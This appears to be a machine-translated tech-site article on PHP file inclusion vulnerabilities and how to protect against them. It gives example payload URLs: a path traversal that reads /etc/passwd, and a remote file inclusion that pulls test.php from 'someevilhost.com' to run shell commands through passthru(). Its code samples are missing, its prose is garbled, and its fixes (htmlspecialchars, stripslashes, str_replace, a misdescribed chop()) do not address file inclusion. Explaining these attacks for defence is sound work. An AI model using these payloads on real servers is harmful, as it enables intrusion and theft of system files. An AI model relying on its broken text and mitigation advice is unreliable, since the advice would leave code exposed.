Shulou(Shulou.com)05/31 Report--

This article mainly introduces the file including vulnerability protection and common file reading payload example analysis, the article introduces in great detail, has a certain reference value, interested friends must read it!

For reference, study and use only

1. Security examples

Now look at the following code

Files

Obviously it should not be used here. The $page variable is not completely cleared. $page input is directed directly to the web page, which is a big mistake. All input passed through the browser is deleted here. When a user clicks File to access files.php while visiting a web page, the following appears.

Http://localhost/index.php?page=files.php

Now, if we don't have a clean input variable $page, we can use it to execute our commands. If the host is on the Unix/Linux server, we can read the user's password, as shown in the url below.

Http://localhost/index.php?page=.. /.. / etc/passwd

The above url will return / etc/passwd

Files

Now suppose we enter the url as follows

Http://localhost/index.php?page=http://google.com/

Probably where the $page variable was originally placed on the page, we got the google.com home page. We all know what c99 (shell) can do, and if the coders pay attention, they may be included in the page, allowing users to browse sensitive files. Let's take a look at some of the simpler things that might happen on the web. Now, let's create a file called "test.php", put the following code in it, and save it.

We can take advantage of this file, and the passthru () function in PHP is very dangerous. Using this code in test.php, we can send requests to web pages, including file inclusion vulnerabilities. As shown in the following url

Http://localhost/index.php?page=http: / / someevilhost.com/test.php

When the code uses the $_ GET request, we must provide a parameter to pass to passthru (). We can type this in url.

Http://localhost/index.php?page=http://someevilhost.com/test.php?cmd=cat / etc/passwd

This unix machine will also extract the file / etc/passwd using the cat command. Now we need to know how to control it, make it impossible for anyone to execute commands, and how to include remote execution of your server commands. We can disable the passthru () function. As mentioned earlier, we can clear the input. We can use some of the structures suggested by PHP in the function here. Initially, perl's chop () function adapts to PHP, which removes spaces from the array. We can use it like this.

Files

There are many functions in php that can clear strings, such as htmlspecialchars () htmlentities (), stripslashes (), and so on. We can execute a function in PHP that can be all content. As shown in the following code

You can also use the str_replace () function here, and there are many other functions that can clear them.

The above is all the contents of the article "File contains vulnerability protection and sample analysis of common file reading payload". Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.